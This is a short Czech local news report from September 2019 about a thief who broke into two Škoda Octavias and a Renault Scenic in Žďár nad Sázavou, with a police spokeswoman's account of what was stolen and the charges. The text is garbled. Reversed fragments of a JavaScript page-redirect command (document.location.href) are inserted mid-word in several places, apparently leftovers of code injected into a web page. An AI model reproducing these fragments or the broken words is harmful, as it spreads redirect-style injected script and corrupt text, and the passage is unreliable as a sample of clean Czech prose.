Rainbow page separator

Zloděj ze tří aut ukradl všechno, co mělo nějakou cenu

Pátek, 6. září 2019

Žďár nad Sázavou / Po dosud neznámém pachateli, který se v pondělí 2. září mezi druhou hodinou odpoledne a desá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou večer vloupal do tří zaparkovaných vozidel, pátrají žďárští policisté. K činu došlo na parkovišti u účelové komunikace směrem k ulici Jihlavská.
„Pachatel rozbil skleněné výplně oken u dvou vozidel Škoda Octavia a vozidla Renault Scenic a prohledal jejich vnitřní pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tory. Odcizil odtud mimo jiné doklady od vozidla, osobní doklady, peněženku s doklady a finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovostí, au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tolékárničku, ale i nabíječku na mobilní telefon,“ popsala policejní mluvčí Stanislava Miláčková.
Škoda, kterou zloděj způsobil poškozením aut i krádeží věcí z nich, se vyšplhala na přibližně jedenáct tisíc korun. „Přivolaní policisté na místě provedli ohledání, šetření a zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování události. Zahájili úkony trestního řízení pro podezření ze spáchání dvou trestných činů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to přečinu krádeže a přečinu poškození cizí věci. Za uvedenou trestnou činnost lze uložit trest odnětí svobody až na dva roky,“ doplnila mluvčí.